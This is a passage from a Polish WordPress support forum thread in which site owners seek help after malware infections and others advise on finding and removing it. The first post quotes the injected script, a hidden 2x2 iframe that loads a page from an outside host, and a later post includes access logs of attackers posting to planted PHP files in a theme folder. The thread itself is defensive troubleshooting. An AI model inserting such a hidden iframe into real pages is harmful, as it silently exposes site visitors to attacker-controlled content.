Wsparcie » Zaawansowane » Złośliwe oprogramowanie

  • Rozwiązano Pysio

    (@pysio)


    Cześć,
    google zablokowało moją stronę ponieważ odkryli złośliwy kod ma mojej stronie. W szczegółach znalazłem go. Wygląda on tak:

    <script type="text/javascript">
    document.write('<iframe src="http://poseyhumane.org/stats.ph
    p" name="Twitter" scrolling="auto" frameborder="no" align="c
    enter" height="2" width="2"></iframe>');
    </script>

    Czy ktoś może mi w jakiś sposób podpowiedzieć jak znaleźć ten kod w stercie innych kodów? Gdzie go szukać? Podejrzewam, że zadomowił się w folderze wp-content ale nie wiem gdzie go dalej szukać.

Viewing 15 replies - 16 through 30 (of 35 total)
  • To wygląda na kawałek motywu…
    http://pastebin.com/MQ0v9qph

    tak własnie myślałem, no ale poprzedni link był głównym powodem tego wszystkiego. dzięki za pomoc. pozdrawiam

    Ja wykorzystuję bardzo szybką metodę na znalezienie zmian w plikach:

    1. instaluję git na kompie wraz z tortoise git
    2. przy pomcy FileZilla zgrywam wszystkie pliki WordPressa na dysk (FileZilla ma filtry pozwalające na ściąganie tylko plików php, html, css, js, w mediach typu jpg, mp3, avi – wirusów nie ma)
    3. tworzę reopzytorium gita, commituję pliki opisując że to jest wersja z wirusem
    4. następnie sprawdzam jaka to wersja WP, ściągam dokładnie taką samą i nagrywam na to co wcześniej ściągnąłem
    5. w git daję diff – i pokazuje mi wszystkie zmiany w plikach
    6. szukam tych podejrzanych, „base64_”, „eval_” i innych
    7. jeśli mam podejrzany kod, mogę go poszukać w innych plikach, nie należących do instalacji WP

    @stahoo, fajny sposób ale nie zawsze taki prosty i szybki jak by się mogło wydawać.

    ad2. „w mediach typu jpg, mp3, avi – wirusów nie ma” -nie jest to niestety do końca prawdą. Poleganie na samym rozszerzeniu jest bardzo złudne. Sztandarowym przykładem jest atak na timthumb, gdzie właśnie są wykorzystywane pliki „graficzne”.
    Takie dwa przykładziki „bezpiecznych” plików z wkładką:
    http://pastebin.com/CBPiKVY7 http://pastebin.com/WLv0UHk4
    A spotkałem i inne przykłady z innymi rozszerzeniami, gdzie to plik był spreparowany lub po prostu zawierał zupełnie inny content niż wskazywało rozszerzenie.

    ad4-7: przy bardzo optymistycznym założeniu, ze zmodyfikowane zostały pliki samego wordpressa. A równie dobrze modyfikacja może siedzieć we wtyczkach, w motywie czy w gdzieś w uploadzie (o tempie i cache nie wspominam) …albo samej bazie danych. Nie zawsze jest możliwość zaciągnięcia czystej (identycznej) wersji do porównania.

    Pewniejsze jest odwrotne działanie …ale to zaś sprowadza się po prostu do okresowego backupu. Ot, jak się wcześniej w żaden sposób nie zabezpieczysz – to potem możesz nie mieć materiału do porównania.

    Thread Starter Pysio

    (@pysio)

    Nie wiem co się dzieje, ale nie mogę się zalogować do kokpitu. Po wpisaniu danych do logowania, i kliknięciu „zaloguj się” otwiera mi się biała karta.
    Podejrzewam, że jest to skutkiem ataku pearl (nie wiem czy dobrze piszę). Niestety nie wiem co w tej sytuacji mogę zrobić. Czy ktoś jest w stanie mi pomóc? Pliki, które były skażone, usunąłem. Ale strona się trochę pierdzieli przez to wszystko..

    Reset/dezaktywacja wszystkich wtyczek
    -Ręczna aktualizacja wordpressa plikami z paczki
    -Zmiana motywu na domyślny

    Thread Starter Pysio

    (@pysio)

    Aby ręcznie zaktualizować, to muszę podmienić foldery
    wp-admin i wp-includes? wp-content zostawiam w spokoju?

    Zrestartowanie wtyczek nic nie dało. Po wpisaniu w wyszukiwarkę adresu:
    ksawerow.org/wp-admin wyświetla mi się komunikat:
    [code]Warning: Cannot modify header information - headers already sent by (output started at /home/ti112429/public_html/ksaweroworg/wp-content/themes/Yamidoo PRO Magazine v1.2/functions.php:754) in /home/ti112429/public_html/ksaweroworg/wp-includes/pluggable.php on line 876[/code]

    Tak, kasjesz wp-admin i wp-includes i wgrywasz ich świeże kopie, wp-content nie ruszasz.
    Nadpisujesz też pliki w katalogu głównym bloga plikami z paczki.

    W kontekście błędu o jakim wspominasz, sprawdź plik wp-config.php i tamten plik functions.php, czy są zapisane z kodowaniem UTF-8 bez BOM i czy przypadkiem nie ma czegoś (np pustej linii, spacji czy czegokolwiek innego) na ich początku – przed znacznikiem otwierającym <?php albo na ich końcu – za ?>
    Art na ten temat – KLIK

    Thread Starter Pysio

    (@pysio)

    adpawl, po raz kolejny baaaardzo Ci dziękuję. Błąd polegał na tym, że była spacja lub enter w pliku functions.php.
    Nie sądziłem, że taka pierdoła tak bardzo może popsuć stronę.
    Cóż, jestem przez to z newsami do tyłu ale szybko nadrobię 🙂 Dzięki wielkie za pomoc jeszcze raz.

    Mam podobny problem ,raz w miesiacu blokowany mam serwer przez dostawce, bo ktos instaluje sobie file menager i rozsyla meile. Tylko jak sie przed tym zabezpieczyc ? bo tutaj wszyscy pisza jak sie pozbyc, ja za kazdym razem instalowalem nowego wordpressa a po miesiacu mialem to samo.

    Uzywam szablony SPECERE. Dostalem logi ,ze chyba wlasnie przez szablon ktos sie wlamal.

    Z logów możesz wyciągnąć którędy dokładnie doszło do infekcji.
    Motyw komercyjny więc nie wiem co tam ma w środku, może korzysta ze starego i dziurawego skryptu timthumb …a może jeszcze coś innego.
    Jezeli motyw jest dziurawy, to spprawdź czy dostępne są jakieś jego aktualizacje lub skontaktuj się z jego autorem. Albo zmień go na inny, bezpieczny.

    Tak czy inaczej musisz najpierw znaleźć powód infekcji i go usunąć, potem dokładnie oczyścić całe konto i na koniec zabezpieczyć.
    http://codex.wordpress.org/Hardening_WordPress
    do tego możesz skorzystać z wtyczek w stylu
    http://wordpress.org/extend/plugins/bulletproof-security/
    http://wordpress.org/extend/plugins/better-wp-security/

    Tutaj na szybko czesc loga:

    gruszecki.ehost.pl:120.174.182.11 - - [05/Jan/2013:16:38:16 +0100] "POST /tom/wp-content/themes/specere/inc/cache/external_5955a2f69bc9cdda42f9c2a95e0b315e.php HTTP/1.1" 200 670 "http://www.gruszecki.ehost.pl/tom/wp-content/themes/specere/inc/cache/external_5955a2f69bc9cdda42f9c2a95e0b315e.php" "Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20130103 Firefox/19.0"
    gruszecki.ehost.pl:114.79.18.70 - - [05/Jan/2013:16:59:40 +0100] "POST /tom/wp-content/themes/specere/inc/cache/external_5955a2f69bc9cdda42f9c2a95e0b315e.php HTTP/1.1" 200 634 "http://www.gruszecki.ehost.pl/tom/wp-content/themes/specere/inc/cache/external_5955a2f69bc9cdda42f9c2a95e0b315e.php" "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0"
    gruszecki.ehost.pl:114.79.18.70 - - [05/Jan/2013:17:05:14 +0100] "POST /tom/wp-content/themes/specere/inc/cache/power.php HTTP/1.1" 200 8107 "http://www.gruszecki.ehost.pl/tom/wp-content/themes/specere/inc/cache/power.php" "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0"
    gruszecki.ehost.pl:114.79.18.70 - - [05/Jan/2013:17:13:50 +0100] "POST /tom/wp-content/themes/specere/inc/cache/power.php? HTTP/1.1" 200 8020 "http://www.gruszecki.ehost.pl/tom/wp-content/themes/specere/inc/cache/power.php" "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0"
    gruszecki.ehost.pl:114.79.0.42 - - [05/Jan/2013:17:20:15 +0100] "POST /tom/wp-content/themes/specere/inc/cache/external_5955a2f69bc9cdda42f9c2a95e0b315e.php HTTP/1.1" 200 624 "http://www.gruszecki.ehost.pl/tom/wp-content/themes/specere/inc/cache/external_5955a2f69bc9cdda42f9c2a95e0b315e.php" "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
    gruszecki.ehost.pl:114.79.0.42 - - [05/Jan/2013:17:20:24 +0100] "POST /tom/wp-content/themes/specere/inc/cache/external_5955a2f69bc9cdda42f9c2a95e0b315e.php HTTP/1.1" 200 635 "http://www.gruszecki.ehost.pl/tom/wp-content/themes/specere/inc/cache/external_5955a2f69bc9cdda42f9c2a95e0b315e.php" "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
    gruszecki.ehost.pl:180.254.92.171 - - [05/Jan/2013:17:24:27 +0100] "POST /tom/wp-content/themes/specere/inc/cache/newfile.php HTTP/1.1" 200 24701 "http://www.gruszecki.ehost.pl/tom/wp-content/themes/specere/inc/cache/newfile.php" "Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0"
    gruszecki.ehost.pl:180.254.92.171 - - [05/Jan/2013:17:24:44 +0100] "POST /tom/wp-content/themes/specere/inc/cache/newfile.php HTTP/1.1" 200 68337 "http://www.gruszecki.ehost.pl/tom/wp-content/themes/specere/inc/cache/newfile.php" "Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0"
    gruszecki.ehost.pl:180.254.92.171 - - [05/Jan/2013:17:28:27 +0100] "POST /tom/wp-content/themes/specere/inc/cache/newfile.php HTTP/1.1" 200 68347 "http://www.gruszecki.ehost.pl/tom/wp-content/themes/specere/inc/cache/newfile.php" "Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0"

    Z takiego kawałeczka nie sposób cokolwiek wywnioskować …tym bardziej nie mając wglądu w zawartość plików i daty ich modyfikacji.

    Ok najszybciej bedzie jak wykasuje i zainstaluje od nowa WP. Prosze mi pomoc co musze zgrac by pozniej odtworzyc wp ? mam tylko zdjecia. a nie chce mi sie pozniej od nowa wszystkich ladowac.

Viewing 15 replies - 16 through 30 (of 35 total)
  • Temat ‘Złośliwe oprogramowanie’ jest zamknięty na nowe odpowiedzi.